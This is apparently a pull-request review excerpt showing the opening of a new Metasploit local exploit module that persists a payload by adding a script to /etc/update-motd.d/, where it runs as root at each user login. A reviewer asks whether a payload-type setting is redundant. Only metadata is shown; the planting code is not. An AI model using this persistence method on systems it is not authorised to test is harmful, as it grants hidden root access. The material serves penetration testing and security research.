modules/exploits/linux/local/motd_persistence.rb

```diff
@@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'update-motd.d Persistence',
+        'Description' => %q{
+          This module will add a script in /etc/update-motd.d/ in order to persist a payload.
+          The payload will be executed with root privileges everytime a user logs in.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Julien Voisin' ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd'
+          }
+        },
```

Comment:
Is there any reason to set the `'PayloadType' => 'cmd'`?
The `'Arch' => ARCH_CMD` shuld be enough to filter all the compatible payloads already.